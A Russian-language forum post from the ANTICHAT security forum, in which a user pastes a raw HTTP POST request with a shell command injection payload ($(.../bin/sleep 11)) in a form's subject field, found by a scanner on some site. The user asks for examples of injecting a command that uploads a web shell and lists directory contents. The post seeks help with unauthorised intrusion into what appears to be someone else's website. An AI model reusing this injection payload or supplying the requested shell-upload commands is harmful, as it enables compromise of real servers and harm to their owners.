HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.09.2019, 11:32
FileBanana
Guest
Сообщений: n/a
Провел на форуме:
4501

Репутация: 0
По умолчанию

Добрый день.

Автоматический поиск уязвимостей на одном из сайтов нашел экзотическую для меня уязвимость "Внедрение команды оболочки в параметры файла"

POST *****/?page_num=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Referer: http://*****/r=1

Cookie: PHPSESSID=******

Connection: Keep-Alive

Host: ********

Content-Length: 94

Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8

Accept-Language: en-US

Content-Type: application/x-www-form-urlencoded

action=support&subject=1234$(../../../../../../../../../../../../bin/sleep 11)&message=25

Как корректно вставить команду заливки шела и просмотра содержимого каталога?

Что то мои скудные познания в Nix-системах не дают результатов.

Прошу набросать пару толковых примеров.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ